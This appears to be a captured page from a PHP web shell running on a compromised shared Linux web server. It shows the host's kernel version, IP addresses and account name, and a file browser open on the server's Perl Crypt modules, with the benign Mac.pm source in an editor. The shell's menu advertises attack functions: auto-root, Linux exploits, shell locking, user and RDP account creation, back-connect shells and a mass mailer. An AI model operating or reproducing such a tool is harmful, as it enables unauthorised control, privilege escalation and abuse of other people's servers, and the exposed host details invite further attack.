Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.34 /
Crypt /
[ HOME SHELL ]
Name
Size
Permission
Action
AuthEnc
[ DIR ]
drwxr-xr-x
Checksum
[ DIR ]
drwxr-xr-x
Cipher
[ DIR ]
drwxr-xr-x
DH
[ DIR ]
drwxr-xr-x
Digest
[ DIR ]
drwxr-xr-x
Mac
[ DIR ]
drwxr-xr-x
Mode
[ DIR ]
drwxr-xr-x
OpenSSL
[ DIR ]
drwxr-xr-x
PK
[ DIR ]
drwxr-xr-x
PRNG
[ DIR ]
drwxr-xr-x
SSLeay
[ DIR ]
drwxr-xr-x
Stream
[ DIR ]
drwxr-xr-x
AuthEnc.pm
152
B
-rw-r--r--
Blowfish.pm
4.66
KB
-rw-r--r--
Checksum.pm
2.2
KB
-rw-r--r--
Cipher.pm
4.09
KB
-rw-r--r--
DES.pm
3.43
KB
-rw-r--r--
Digest.pm
9.12
KB
-rw-r--r--
KeyDerivation.pm
3.65
KB
-rw-r--r--
Mac.pm
711
B
-rw-r--r--
Misc.pm
14.59
KB
-rw-r--r--
Mode.pm
146
B
-rw-r--r--
PK.pm
505
B
-rw-r--r--
PRNG.pm
6.49
KB
-rw-r--r--
Rijndael.pm
3.06
KB
-rw-r--r--
SSLeay.pm
16.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Mac.pm
package Crypt::Mac; use strict; use warnings; our $VERSION = '0.076'; use Carp; $Carp::Internal{(__PACKAGE__)}++; use CryptX; sub addfile { my ($self, $file) = @_; my $handle; if (ref(\$file) eq 'SCALAR') { open($handle, "<", $file) || die "FATAL: cannot open '$file': $!"; binmode($handle); } else { $handle = $file } die "FATAL: invalid handle" unless defined $handle; my $n; my $buf = ""; local $SIG{__DIE__} = \&CryptX::_croak; while (($n = read($handle, $buf, 32*1024))) { $self->add($buf); } die "FATAL: read failed: $!" unless defined $n; return $self; } sub CLONE_SKIP { 1 } # prevent cloning 1; =pod =head1 NAME Crypt::Mac - [internal only] =cut
Close